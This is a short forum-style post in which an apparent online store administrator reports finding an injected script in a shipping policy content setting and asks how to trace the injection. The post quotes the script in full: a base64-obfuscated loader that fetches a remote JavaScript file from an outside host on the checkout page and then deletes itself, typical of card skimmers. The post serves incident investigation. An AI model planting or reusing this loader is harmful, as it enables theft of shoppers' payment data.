we found a script like this
in shipping/shipping_policy/shipping_policy_content
<script id="shopcart">((g,r,w,s,t,o) => {if(g.location.href.indexOf(atob(t))>-1){a=r.createElement(w);a.id="carthelper";a.async=1;a.src=atob(o);r.body.appendChild(a);}if(document.querySelector("#shopcart")){document.querySelector("#shopcart").remove();}})(window,document,"script","gCaptcha","Y2hlY2tvdXQ","aHR0cHM6Ly9zdGF0aWMud2ViYWdlbmN5YW5hbHl0aWNzLmNvbS9tYWluLmpzP3Y9MS4wLjM")</script>
Which translates to https://static.webagencyanalytics.com/main.js?v=1.0.3
I’m trying to determine how this was injected but I can’t find references to the script itself or the base64 encoded string or the decoded string
Any ideas how I can detect the root cause?
I’m using modsecurity and I’m already logging GET/POST requests for this.